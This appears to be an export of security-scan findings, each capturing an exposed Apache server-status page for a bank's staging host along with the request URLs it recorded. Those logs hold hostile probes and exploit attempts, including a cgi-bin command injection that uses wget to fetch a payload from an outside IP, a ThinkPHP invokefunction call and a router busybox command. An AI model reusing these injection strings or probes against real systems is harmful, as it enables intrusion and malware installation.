1.78203449260.00.0628.02
127.0.0.1http/1.1127.0.1.1:8080GET /v2/_catalog HTTP/1.1
1-10830423170/19/3798_
1.78403027270.00.0622.99
127.0.0.1http/1.1127.0.1.1:8080GET /about HTTP/1.1
1-10830423170/14/3912_
1.771703478170.00.0332.46
127.0.0.1http/1.1127.0.1.1:8080GET /swagger/swagger-ui.html HTTP/1.1
1-10830423170/18/3912_
1.771603437550.00.0426.58
127.0.0.1http/1.1127.0.1.1:8080GET /webjars/swagger-ui/index.html HTTP/1.1
1-10830423170/24/3865_
1.771503578370.00.0533.48
127.0.0.1http/1.1127.0.1.1:8080GET /swagger.json HTTP/1.1
1-10830423170/14/3873_
1.781403415610.00.0926.84
127.0.0.1http/1.1127.0.1.1:8080GET /swagger/v1/swagger.json HTTP/1.1
1-10830423170/17/3892_
1.781203308050.00.0522.77
127.0.0.1http/1.1127.0.1.1:8080GET /v3/api-docs HTTP/1.1
1-10830423170/24/3854_
1.781303483690.00.0625.66
127.0.0.1http/1.1127.0.1.1:8080GET /v2/api-docs HTTP/1.1
1-10830423170/16/3853_
1.781103326640.00.0426.28
127.0.0.1http/1.1127.0.1.1:8080GET /api-docs/swagger.json HTTP/1.1
1-10830423170/17/3855_
1.781003394140.00.0924.87
127.0.0.1http/1.1127.0.1.1:8080GET /api/swagger.json HTTP/1.1
1-10830423170/22/3797_
1.78903389010.00.0725.04
127.0.0.1http/1.1127.0.1.1:8080GET /@vite/env HTTP/1.1
1-10830423170/18/3863_
1.78803276180.00.0723.10
127.0.0.1http/1.1127.0.1.1:8080GET /actuator/env HTTP/1.1
1-10830423170/16/3869_
1.78303164510.00.0446.00
127.0.0.1http/1.1127.0.1.1:8080GET /debug/default/view?panel=config HTTP/1.1
1-10830423170/21/3878_
1.78603330170.00.0624.36
127.0.0.1http/1.1127.0.1.1:8080GET /.vscode/sftp.json HTTP/1.1
1-10830423170/15/3861_
1.78703156720.00.0824.00
127.0.0.1http/1.1127.0.1.1:8080GET /server HTTP/1.1
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31c9c7b251c9c7b251425392ad
Apache Status
Apache Server Status for www.algerie.stagingirb.bnpparibas (via 127.0.0.1)
Server Version: Apache/2.4.65 (Debian) OpenSSL/1.1.1w
Server MPM: event
Server Built: 2025-07-29T20:18:46
Current Time: Tuesday, 16-Dec-2025 08:53:46 CET
Restart Time: Tuesday, 02-Sep-2025 12:14:26 CEST
Parent Server Config. Generation: 107
Parent Server MPM Generation: 106
Server uptime: 104 days 21 hours 39 minutes 19 seconds
Server load: 0.06 0.03 0.00
Total accesses: 256851 - Total Traffic: 1.9 GB - Total Duration: 22466140
CPU Usage: u266.14 s368.16 cu467.28 cs146.56 - .0138% CPU load
.0283 requests/sec - 219 B/second - 7.6 kB/request - 87.4676 ms/request
1 requests currently being processed, 0 workers gracefully restarting, 49 idle workers
SlotPIDStoppingConnections
ThreadsAsync connections
totalacceptingbusygracefulidlewait-iowritingkeep-aliveclosing
12745684no1yes10240010
32745683no0yes00250000
Sum201 10490010
.........................W________________________..............
..........._________________________............................
......................
Scoreboard Key:
"_" Waiting for Connection,
"S" Starting up,
"R" Reading Request,
"W" Sending Reply,
"K" Keepalive (read),
"D" DNS Lookup,
"C" Closing connection,
"L" Logging,
"G" Gracefully finishing,
"I" Idle cleanup of worker,
"." Open slot with no current process
SrvPIDAccMCPU
SSReqDurConnChildSlotClientProtocolVHostRequest
0-80-0/0/1445.
0.0021920220876330.00.006.44
127.0.0.1http/1.1127.0.1.1:8080GET /backend/.git/config HTTP/1.1
0-80-0/0/1477.
0.0021920220854180.00.006.75
127.0.0.1http/1.1127.0.1.1:8080POST /cgi-bin/login.cgi HTTP/1.1
0-80-0/0/1456.
0.0021920220795740.00.006.64
127.0.0.1http/1.1127.0.1.1:8080POST /goform/mp HTTP/1.1
0-80-0/0/1431.
0.0021920222923170.00.008.09
127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1
0-80-0/0/1471.
0.0021920221959160.00.005.97
127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1
0-80-0/0/1467.
0.00219202201120610.00.008.87
127.0.0.1http/1.1127.0.1.1:8080GET /cgi-bin/;wget${IFS}-qO-${IFS}http://74.194.191.52/rondo.sb
0-80-0/0/1496.
0.0021920221980370.00.0022.71
127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1
0-80-0/0/1464.
0.0021920220872930.00.0028.32
127.0.0.1http/1.1127.0.1.1:8080POST /apply.cgi HTTP/1.1
0-80-0/0/1469.
0.0021920220954320.00.006.82
127.0.0.1http/1.1127.0.1.1:8080GET /favicon.ico HTTP/1.1
0-80-0/0/1447.
0.0021920221804010.00.007.07
127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1
0-80-0/0/1437.
0.0021920220763390.00.0018.86
127.0.0.1http/1.1127.0.1.1:8080GET /backend/.git/config HTTP/1.1
0-80-0/0/1455.
0.00219202201128510.00.0028.52
127.0.0.1http/1.1127.0.1.1:8080POST /apply.cgi HTTP/1.1
0-80-0/0/1422.
0.0021920221807520.00.007.35
127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1
0-80-0/0/1437.
0.00219202201242840.00.007.90
127.0.0.1http/1.1127.0.1.1:8080GET /index.php?s=/Index/\\think\\app/invokefunction&function=call
0-80-0/0/1427.
0.0021920220842500.00.0014.61
127.0.0.1http/1.1127.0.1.1:8080POST /cgi-bin/cgi_main.cgi HTTP/1.1
0-80-0/0/1452.
0.0021920220873780.00.005.65
127.0.0.1http/1.1127.0.1.1:8080GET /__down?bytes=10 HTTP/1.1
0-80-0/0/1450.
0.0021920221758340.00.007.28
127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1
0-80-0/0/1422.
0.0021920221872420.00.0015.27
127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1
0-80-0/0/1436.
0.0021920220839090.00.005.78
127.0.0.1http/1.1127.0.1.1:8080GET /HNAP1/ HTTP/1.1
0-80-0/0/1458.
0.0021920220861330.00.0019.53
127.0.0.1http/1.1127.0.1.1:8080POST /dvr/cmd HTTP/1.1
0-80-0/0/1430.
0.0021920221844070.00.007.30
127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1
0-80-0/0/1428.
0.0021920220940400.00.0012.18
127.0.0.1http/1.1127.0.1.1:8080GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=busybox%20
0-80-0/0/1445.
0.0021920220882420.00.007.60
127.0.0.1http/1.1127.0.1.1:8080POST /cgi-bin/system_mgr.cgi? HTTP/1.1
0-80-0/0/1453.
0.0021920220866550.00.007.23
127.0.0.1http/1.1127.0.1.1:8080GET /favicon.ico HTTP/1.1
0-80-0/0/1422.
0.0021920221852040.00.006.35
127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1
1-106274568425/21/3871W
1.26003438640.00.0326.24
127.0.0.1http/1.1127.0.1.1:8080GET /server-status HTTP/1.1
1-10627456840/28/3807_
1.411103268550.00.0426.53
127.0.0.1http/1.1127.0.1.1:8080GET /api-docs/swagger.json HTTP/1.1
1-10627456840/27/3663_
1.401533323180.00.0325.72
127.0.0.1http/1.1127.0.1.1:8080GET /swagger.json HTTP/1.1
1-10627456840/21/3797_
1.401603412970.00.0224.85
127.0.0.1http/1.1127.0.1.1:8080GET /webjars/swagger-ui/index.html HTTP/1.1
1-10627456840/24/3809_
1.401403344290.00.0325.63
127.0.0.1http/1.1127.0.1.1:8080GET /swagger/v1/swagger.json HTTP/1.1
1-10627456840/23/3759_
1.411003143200.00.0228.24
127.0.0.1http/1.1127.0.1.1:8080GET /api/swagger.json HTTP/1.1
1-10627456840/23/3817_
1.401203761270.00.0524.23
127.0.0.1http/1.1127.0.1.1:8080GET /v2/api-docs HTTP/1.1
1-10627456840/25/3829_
1.401703336920.00.0325.03
127.0.0.1http/1.1127.0.1.1:8080GET /swagger/swagger-ui.html HTTP/1.1
1-10627456840/26/3715_
1.42003393750.00.0425.84
127.0.0.1http/1.1127.0.1.1:8080GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor
1-10627456840/26/3768_
1.401803105270.00.0423.86
127.0.0.1http/1.1127.0.1.1:8080GET /swagger/index.html HTTP/1.1
1-10627456840/24/3849_
1.42113447800.00.0327.86
127.0.0.1http/1.1127.0.1.1:8080GET /v2/_catalog HTTP/1.1
1-10627456840/20/3733_
1.401903026010.00.0222.84
127.0.0.1http/1.1127.0.1.1:8080GET /swagger-ui.html HTTP/1.1
1-10627456840/23/3852_
1.42203477110.00.0232.34
127.0.0.1http/1.1127.0.1.1:8080GET /debug/default/view?panel=config HTTP/1.1
1-10627456840/24/3840_
1.402003430030.00.0326.43
127.0.0.1http/1.1127.0.1.1:8080POST /api/gql HTTP/1.1
1-10627456840/30/3790_
1.42303576460.00.0433.32
127.0.0.1http/1.1127.0.1.1:8080GET /about HTTP/1.1
1-10627456840/28/3811_
1.402003414330.00.1726.67
127.0.0.1http/1.1127.0.1.1:8080POST /graphql/api HTTP/1.1
1-10627456840/29/3825_
1.41603306620.00.0422.62
127.0.0.1http/1.1127.0.1.1:8080GET /.vscode/sftp.json HTTP/1.1
1-10627456840/27/3778_
1.41803481950.00.0425.51
127.0.0.1http/1.1127.0.1.1:8080GET /actuator/env HTTP/1.1
1-10627456840/22/3791_
1.402003325720.00.0226.16
127.0.0.1http/1.1127.0.1.1:8080POST /api HTTP/1.1
1-10627456840/22/3800_
1.41703384100.00.0224.72
127.0.0.1http/1.1127.0.1.1:8080GET /server HTTP/1.1
1-10627456840/23/3726_
1.402003387570.00.0424.88
127.0.0.1http/1.1127.0.1.1:8080POST /api/graphql HTTP/1.1
1-10627456840/28/3795_
1.41903274410.00.0222.94
127.0.0.1http/1.1127.0.1.1:8080GET /@vite/env HTTP/1.1
1-10627456840/26/3807_
1.402113163180.00.0345.86
127.0.0.1http/1.1127.0.1.1:8080POST /graphql HTTP/1.1
1-10627456840/29/3809_
1.411213328700.00.0424.20
127.0.0.1http/1.1127.0.1.1:8080GET /v3/api-docs HTTP/1.1
1-10627456840/21/3796_
1.392253155090.00.0323.81
127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31c9c7b251c9c7b251814f194d
Apache Status
Apache Server Status for www.algerie.stagingirb.bnpparibas (via 127.0.0.1)
Server Version: Apache/2.4.65 (Debian) OpenSSL/1.1.1w
Server MPM: event
Server Built: 2025-07-29T20:18:46
Current Time: Friday, 12-Dec-2025 15:01:01 CET
Restart Time: Tuesday, 02-Sep-2025 12:14:26 CEST
Parent Server Config. Generation: 103
Parent Server MPM Generation: 102
Server uptime: 101 days 3 hours 46 minutes 34 seconds
Server load: 0.01 0.01 0.00
Total accesses: 251171 - Total Traffic: 1.8 GB - Total Duration: 22453148
CPU Usage: u255.37 s355.58 cu451.37 cs140.75 - .0138% CPU load
.0287 requests/sec - 226 B/second - 7.7 kB/request - 89.3939 ms/request
1 requests currently being processed, 0 workers gracefully restarting, 49 idle workers
SlotPIDStoppingConnections
ThreadsAsync connections
totalacceptingbusygracefulidlewait-iowritingkeep-aliveclosing
12149232no1yes10240010
32149229no0yes00250000
Sum201 10490010
.........................___W_____________________..............
..........._________________________............................
......................
Scoreboard Key:
"_" Waiting for Connection,
"S" Starting up,
"R" Reading Request,
"W" Sending Reply,
"K" Keepalive (read),
"D" DNS Lookup,
"C" Closing connection,
"L" Logging,
"G" Gracefully finishing,
"I" Idle cleanup of worker,
"." Open slot with no current process
SrvPIDAccMCPU
SSReqDurConnChildSlotClientProtocolVHostRequest
0-80-0/0/1445.
0.0018684570876330.00.006.44
127.0.0.1http/1.1127.0.1.1:8080GET /backend/.git/config HTTP/1.1
0-80-0/0/1477.
0.0018684570854180.00.006.75
127.0.0.1http/1.1127.0.1.1:8080POST /cgi-bin/login.cgi HTTP/1.1
0-80-0/0/1456.
0.0018684570795740.00.006.64
127.0.0.1http/1.1127.0.1.1:8080POST /goform/mp HTTP/1.1
0-80-0/0/1431.
0.0018684572923170.00.008.09
127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1
0-80-0/0/1471.
0.0018684571959160.00.005.97
127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1
0-80-0/0/1467.
0.00186845701120610.00.008.87
127.0.0.1http/1.1127.0.1.1:8080GET /cgi-bin/;wget${IFS}-qO-${IFS}http://74.194.191.52/rondo.sb
0-80-0/0/1496.
0.0018684571980370.00.0022.71
127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1
0-80-0/0/1464.
0.0018684570872930.00.0028.32
127.0.0.1http/1.1127.0.1.1:8080POST /apply.cgi HTTP/1.1
0-80-0/0/1469.
0.0018684570954320.00.006.82
127.0.0.1http/1.1127.0.1.1:8080GET /favicon.ico HTTP/1.1
0-80-0/0/1447.
0.0018684571804010.00.007.07
127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1
0-80-0/0/1437.
0.0018684570763390.00.0018.86
127.0.0.1http/1.1127.0.1.1:8080GET /backend/.git/config HTTP/1.1
0-80-0/0/1455.
0.00186845701128510.00.0028.52
127.0.0.1http/1.1127.0.1.1:8080POST /apply.cgi HTTP/1.1
0-80-0/0/1422.
0.0018684571807520.00.007.35
127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1
0-80-0/0/1437.
0.00186845701242840.00.007.90
127.0.0.1http/1.1127.0.1.1:8080GET /index.php?s=/Index/\\think\\app/invokefunction&function=call
0-80-0/0/1427.
0.0018684570842500.00.0014.61
127.0.0.1http/1.1127.0.1.1:8080POST /cgi-bin/cgi_main.cgi HTTP/1.1
0-80-0/0/1452.
0.0018684570873780.00.005.65
127.0.0.1http/1.1127.0.1.1:8080GET /__down?bytes=10 HTTP/1.1
0-80-0/0/1450.
0.0018684571758340.00.007.28
127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1
0-80-0/0/1422.
0.0018684571872420.00.0015.27
127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1
0-80-0/0/1436.
0.0018684570839090.00.005.78
127.0.0.1http/1.1127.0.1.1:8080GET /HNAP1/ HTTP/1.1
0-80-0/0/1458.
0.0018684570861330.00.0019.53
127.0.0.1http/1.1127.0.1.1:8080POST /dvr/cmd HTTP/1.1
0-80-0/0/1430.
0.0018684571844070.00.007.30
127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1
0-80-0/0/1428.
0.0018684570940400.00.0012.18
127.0.0.1http/1.1127.0.1.1:8080GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=busybox%20
0-80-0/0/1445.
0.0018684570882420.00.007.60
127.0.0.1http/1.1127.0.1.1:8080POST /cgi-bin/system_mgr.cgi? HTTP/1.1
0-80-0/0/1453.
0.0018684570866550.00.007.23
127.0.0.1http/1.1127.0.1.1:8080GET /favicon.ico HTTP/1.1
0-80-0/0/1422.
0.0018684571852040.00.006.35
127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1
1-10221492320/33/3750_
2.37303436080.00.0526.05
127.0.0.1http/1.1127.0.1.1:8080GET /debug/default/view?panel=config HTTP/1.1
1-10221492320/30/3679_
2.37203265910.00.0526.32
127.0.0.1http/1.1127.0.1.1:8080GET /v2/_catalog HTTP/1.1
1-10221492320/27/3541_
2.37103320680.00.0425.53
127.0.0.1http/1.1127.0.1.1:8080GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor
1-102214923225/29/3675W
2.24003410250.00.0524.67
127.0.0.1http/1.1127.0.1.1:8080GET /server-status HTTP/1.1
1-10221492320/29/3668_
2.352213341640.00.0625.37
127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1
1-10221492320/28/3641_
2.352103141080.00.0628.06
127.0.0.1http/1.1127.0.1.1:8080POST /graphql HTTP/1.1
1-10221492320/28/3686_
2.352103758760.00.0423.99
127.0.0.1http/1.1127.0.1.1:8080POST /api HTTP/1.1
1-10221492320/31/3680_
2.36603333960.00.0524.77
127.0.0.1http/1.1127.0.1.1:8080GET /.vscode/sftp.json HTTP/1.1
1-10221492320/27/3566_
2.352103390930.00.0425.58
127.0.0.1http/1.1127.0.1.1:8080POST /api/graphql HTTP/1.1
1-10221492320/29/3644_
2.37403102880.00.0523.65
127.0.0.1http/1.1127.0.1.1:8080GET /about HTTP/1.1
1-10221492320/32/3704_
2.36703445000.00.0327.61
127.0.0.1http/1.1127.0.1.1:8080GET /server HTTP/1.1
1-10221492320/28/3610_
2.36803023200.00.0422.63
127.0.0.1http/1.1127.0.1.1:8080GET /actuator/env HTTP/1.1
1-10221492320/28/3716_
2.36903474280.00.0532.12
127.0.0.1http/1.1127.0.1.1:8080GET /@vite/env HTTP/1.1
1-10221492320/32/3706_
2.352103426980.00.0526.19
127.0.0.1http/1.1127.0.1.1:8080POST /graphql/api HTTP/1.1
1-10221492320/32/3658_
2.352103573680.00.0533.11
127.0.0.1http/1.1127.0.1.1:8080POST /api/gql HTTP/1.1
1-10221492320/32/3678_
2.361003411060.00.0526.29
127.0.0.1http/1.1127.0.1.1:8080GET /api/swagger.json HTTP/1.1
1-10221492320/30/3698_
2.351903304180.00.0522.39
127.0.0.1http/1.1127.0.1.1:8080GET /swagger-ui.html HTTP/1.1
1-10221492320/32/3646_
2.351803478960.00.0525.28
127.0.0.1http/1.1127.0.1.1:8080GET /swagger/index.html HTTP/1.1
1-10221492320/29/3656_
2.351703322880.00.0425.94
127.0.0.1http/1.1127.0.1.1:8080GET /swagger/swagger-ui.html HTTP/1.1
1-10221492320/28/3674_
2.351603381550.00.0524.52
127.0.0.1http/1.1127.0.1.1:8080GET /webjars/swagger-ui/index.html HTTP/1.1
1-10221492320/33/3595_
2.351503373880.00.0524.51
127.0.0.1http/1.1127.0.1.1:8080GET /swagger.json HTTP/1.1
1-10221492320/31/3652_
2.351403271490.00.0522.72
127.0.0.1http/1.1127.0.1.1:8080GET /swagger/v1/swagger.json HTTP/1.1
1-10221492320/30/3681_
2.351303160770.00.0545.66
127.0.0.1http/1.1127.0.1.1:8080GET /v2/api-docs HTTP/1.1
1-10221492320/28/3671_
2.351203326160.00.0623.96
127.0.0.1http/1.1127.0.1.1:8080GET /v3/api-docs HTTP/1.1
1-10221492320/33/3664_
2.361103152080.00.0623.55
127.0.0.1http/1.1127.0.1.1:8080GET /api-docs/swagger.json HTTP/1.1</
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31c9c7b251c9c7b251f92714ed
Apache Status
Apache Server Status for www.algerie.stagingirb.bnpparibas (via 127.0.0.1)
Server Version: Apache/2.4.65 (Debian) OpenSSL/1.1.1w
Server MPM: event
Server Built: 2025-07-29T20:18:46
Current Time: Wednesday, 10-Dec-2025 22:47:44 CET
Restart Time: Tuesday, 02-Sep-2025 12:14:26 CEST
Parent Server Config. Generation: 101
Parent Server MPM Generation: 100
Server uptime: 99 days 11 hours 33 minutes 17 seconds
Server load: 0.08 0.08 0.02
Total accesses: 247925 - Total Traffic: 1.8 GB - Total Duration: 22385216
CPU Usage: u252.76 s350.65 cu440.14 cs137.21 - .0137% CPU load
.0288 requests/sec - 227 B/second - 7.7 kB/request - 90.2903 ms/request
1 requests currently being processed, 0 workers gracefully restarting, 49 idle workers
SlotPIDStoppingConnections
ThreadsAsync connections
totalacceptingbusygracefulidlewait-iowritingkeep-aliveclosing
11852342no0yes00250000
31852341no1yes10240010
Sum201 10490010
........................._________________________..............
...........____________W____________............................
......................
Scoreboard Key:
"_" Waiting for Connection,
"S" Starting up,
"R" Reading Request,
"W" Sending Reply,
"K" Keepalive (read),
"D" DNS Lookup,
"C" Closing connection,
"L" Logging,
"G" Gracefully finishing,
"I" Idle cleanup of worker,
"." Open slot with no current process
SrvPIDAccMCPU
SSReqDurConnChildSlotClientProtocolVHostRequest
0-80-0/0/1445.
0.0017236600876330.00.006.44
127.0.0.1http/1.1127.0.1.1:8080GET /backend/.git/config HTTP/1.1
0-80-0/0/1477.
0.0017236600854180.00.006.75
127.0.0.1http/1.1127.0.1.1:8080POST /cgi-bin/login.cgi HTTP/1.1
0-80-0/0/1456.
0.0017236600795740.00.006.64
127.0.0.1http/1.1127.0.1.1:8080POST /goform/mp HTTP/1.1
0-80-0/0/1431.
0.0017236602923170.00.008.09
127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1
0-80-0/0/1471.
0.0017236601959160.00.005.97
127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1
0-80-0/0/1467.
0.00172366001120610.00.008.87
127.0.0.1http/1.1127.0.1.1:8080GET /cgi-bin/;wget${IFS}-qO-${IFS}http://74.194.191.52/rondo.sb
0-80-0/0/1496.
0.0017236601980370.00.0022.71
127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1
0-80-0/0/1464.
0.0017236600872930.00.0028.32
127.0.0.1http/1.1127.0.1.1:8080POST /apply.cgi HTTP/1.1
0-80-0/0/1469.
0.0017236600954320.00.006.82
127.0.0.1http/1.1127.0.1.1:8080GET /favicon.ico HTTP/1.1
0-80-0/0/1447.
0.0017236601804010.00.007.07
127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1
0-80-0/0/1437.
0.0017236600763390.00.0018.86
127.0.0.1http/1.1127.0.1.1:8080GET /backend/.git/config HTTP/1.1
0-80-0/0/1455.
0.00172366001128510.00.0028.52
127.0.0.1http/1.1127.0.1.1:8080POST /apply.cgi HTTP/1.1
0-80-0/0/1422.
0.0017236601807520.00.007.35
127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1
0-80-0/0/1437.
0.00172366001242840.00.007.90
127.0.0.1http/1.1127.0.1.1:8080GET /index.php?s=/Index/\\think\\app/invokefunction&function=call
0-80-0/0/1427.
0.0017236600842500.00.0014.61
127.0.0.1http/1.1127.0.1.1:8080POST /cgi-bin/cgi_main.cgi HTTP/1.1
0-80-0/0/1452.
0.0017236600873780.00.005.65
127.0.0.1http/1.1127.0.1.1:8080GET /__down?bytes=10 HTTP/1.1
0-80-0/0/1450.
0.0017236601758340.00.007.28
127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1
0-80-0/0/1422.
0.0017236601872420.00.0015.27
127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1
0-80-0/0/1436.
0.0017236600839090.00.005.78
127.0.0.1http/1.1127.0.1.1:8080GET /HNAP1/ HTTP/1.1
0-80-0/0/1458.
0.0017236600861330.00.0019.53
127.0.0.1http/1.1127.0.1.1:8080POST /dvr/cmd HTTP/1.1
0-80-0/0/1430.
0.0017236601844070.00.007.30
127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1
0-80-0/0/1428.
0.0017236600940400.00.0012.18
127.0.0.1http/1.1127.0.1.1:8080GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=busybox%20
0-80-0/0/1445.
0.0017236600882420.00.007.60
127.0.0.1http/1.1127.0.1.1:8080POST /cgi-bin/system_mgr.cgi? HTTP/1.1
0-80-0/0/1453.
0.0017236600866550.00.007.23
127.0.0.1http/1.1127.0.1.1:8080GET /favicon.ico HTTP/1.1
0-80-0/0/1422.
0.0017236601852040.00.006.35
127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1
1-10018523420/47/3661_
4.61136103423830.00.3125.75
127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1
1-10018523420/48/3600_
4.56133753253330.00.2425.97
127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1
1-10018523420/42/3462_
4.48110413231970.00.3324.92
127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1
1-10018523420/45/3594_
4.474033379830.00.2024.33
127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1
1-10018523420/53/3587_
4.57103663339400.00.4124.95
127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1
1-10018523420/52/3557_
4.624553132560.00.2827.60
127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1
1-10018523420/47/3605_
4.53103143735780.00.2823.71
127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1
1-10018523420/47/3589_
4.35124013321240.00.3624.38
127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1
1-10018523420/55/3487_
4.56110903381560.00.4825.25
127.0.0.1http/1.1127.0.1.1:8080GET /cgi-bin/luci/;stok=/locale HTTP/1.1
1-10018523420/44/3559_
4.36103113086260.00.3123.27
127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1
1-10018523420/45/3614_
4.36110453434680.00.3627.22
127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1
1-10018523420/55/3532_
4.5394053018710.00.3122.27
127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1
1-10018523420/49/3631_
4.5794513454410.00.3131.73
127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1
1-10018523420/48/3622_
4.5513113398060.00.2025.82
127.0.0.1http/1.1127.0.1.1:8080GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1
1-10018523420/45/3568_
4.3794033530510.00.2532.73
127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1
1-10018523420/46/3595_
4.48124053399710.00.6326.01
127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1
1-10018523420/50/3620_
4.5434013283530.00.3422.09
127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1
1-10018523420/46/3554_
4.35133213473060.00.2724.94
127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1
1-10018523420/53/3571_
4.6034553316860.00.2425.52
127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1
1-10018523420/45/3598_
4.4534003372970.00.3524.27
127.0.0.1http/1.1127.0.1.1:8080GET /security.txt HTTP/1.1
1-10018523420/45/3509_
4.4613163364180.00.3424.01
127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1
1-10018523420/49/3575_
4.564083263410.00.3022.22
127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1
1-10018523420/44/3596_
4.47133213142290.00.2545.33
127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1
1-10018523420/45/3588_
4.34163143317020.00.1923.62
127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1
1-10018523420/50/3585_
4.56124513140190.00.3023.21
127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1
2-78-0/0/2607.
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31c9c7b251c9c7b251df3e33d4
Apache Status
Apache Server Status for www.algerie.stagingirb.bnpparibas (via 127.0.0.1)
Server Version: Apache/2.4.65 (Debian) OpenSSL/1.1.1w
Server MPM: event
Server Built: 2025-07-29T20:18:46
Current Time: Monday, 01-Dec-2025 01:59:18 CET
Restart Time: Tuesday, 02-Sep-2025 12:14:26 CEST
Parent Server Config. Generation: 92
Parent Server MPM Generation: 91
Server uptime: 89 days 14 hours 44 minutes 52 seconds
Server load: 0.00 0.00 0.00
Total accesses: 221580 - Total Traffic: 1.7 GB - Total Duration: 21718566
CPU Usage: u221.39 s314.09 cu399.24 cs123.63 - .0137% CPU load
.0286 requests/sec - 230 B/second - 7.9 kB/request - 98.0168 ms/request
1 requests currently being processed, 0 workers gracefully restarting, 49 idle workers
SlotPIDStoppingConnections
ThreadsAsync connections
totalacceptingbusygracefulidlewait-iowritingkeep-aliveclosing
1520915no1yes10240010
3520910no0yes00250000
Sum201 10490010
.........................____________W____________..............
..........._________________________............................
......................
Scoreboard Key:
"_" Waiting for Connection,
"S" Starting up,
"R" Reading Request,
"W" Sending Reply,
"K" Keepalive (read),
"D" DNS Lookup,
"C" Closing connection,
"L" Logging,
"G" Gracefully finishing,
"I" Idle cleanup of worker,
"." Open slot with no current process
SrvPIDAccMCPU
SSReqDurConnChildSlotClientProtocolVHostRequest
0-80-0/0/1445.
0.008711550876330.00.006.44
127.0.0.1http/1.1127.0.1.1:8080GET /backend/.git/config HTTP/1.1
0-80-0/0/1477.
0.008711550854180.00.006.75
127.0.0.1http/1.1127.0.1.1:8080POST /cgi-bin/login.cgi HTTP/1.1
0-80-0/0/1456.
0.008711550795740.00.006.64
127.0.0.1http/1.1127.0.1.1:8080POST /goform/mp HTTP/1.1
0-80-0/0/1431.
0.008711552923170.00.008.09
127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1
0-80-0/0/1471.
0.008711551959160.00.005.97
127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1
0-80-0/0/1467.
0.0087115501120610.00.008.87
127.0.0.1http/1.1127.0.1.1:8080GET /cgi-bin/;wget${IFS}-qO-${IFS}http://74.194.191.52/rondo.sb
0-80-0/0/1496.
0.008711551980370.00.0022.71
127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1
0-80-0/0/1464.
0.008711550872930.00.0028.32
127.0.0.1http/1.1127.0.1.1:8080POST /apply.cgi HTTP/1.1
0-80-0/0/1469.
0.008711550954320.00.006.82
127.0.0.1http/1.1127.0.1.1:8080GET /favicon.ico HTTP/1.1
0-80-0/0/1447.
0.008711551804010.00.007.07
127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1
0-80-0/0/1437.
0.008711550763390.00.0018.86
127.0.0.1http/1.1127.0.1.1:8080GET /backend/.git/config HTTP/1.1
0-80-0/0/1455.
0.0087115501128510.00.0028.52
127.0.0.1http/1.1127.0.1.1:8080POST /apply.cgi HTTP/1.1
0-80-0/0/1422.
